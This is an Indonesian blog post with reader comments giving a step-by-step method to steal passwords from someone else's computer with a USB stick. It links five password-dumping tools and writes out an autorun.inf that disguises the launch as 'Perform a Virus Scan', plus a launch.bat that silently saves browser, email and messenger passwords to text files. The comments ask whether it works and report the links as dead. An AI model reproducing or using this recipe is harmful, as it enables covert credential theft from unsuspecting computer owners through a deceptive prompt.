Hack password dengan USB

Download 5 tools dibawah ini :

http://www.yrebooks.com/iepv.zip

http://www.yrebooks.com/mailpv.zip

http://www.yrebooks.com/mspass.zip

http://www.yrebooks.com/passwordfox.zip

http://www.yrebooks.com/pspv.zip

iepv -> mencuri password yang menggunakan internet explorer

mspass -> mencuri password messenger

mailpv -> curi password email

pspv -> mirip iepv, cman pspv bs mengambil password dari browser MSN, dan opera

passwordfox -> mirip iepv dan pspv, cman ini bisa jalan di firefox

step by step :

1. buka notepad dan ketik

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

Simpan nama file sebagai autorun.inf dan letakkan di USB

2. Buka notepad dan ketik

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Simpan dengan nama launch.bat dan letakkan di USB

Cara kerja :

1. Masukkan USB ke laptop or PC.

2. USB akan muncul secara otomatis, muncul pop-up windows dan pilih (Perform a Virus Scan).

3. Semua password yang ke record akan disimpan di .txt file

4. Lepaskan USB dan buka file .txt, semua akan terlihat disitu..

try that…

_________________

I will be a good man in the future

6 Komentar

  1. kalau autorun nya dimatiin gimana ? bisa engga ?

    • dicoba aja boz.. hehe..

  2. dicoba nih gan..

  3. ancux

  4. Sobat 5 tool yang disarankan untuk di download setelah saya masuk alamtanya kok gak bisa n gak ada ya….trus gimana nih caranya

  5. Linknya gk kebaca….😦


Comments RSS TrackBack Identifier URI

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s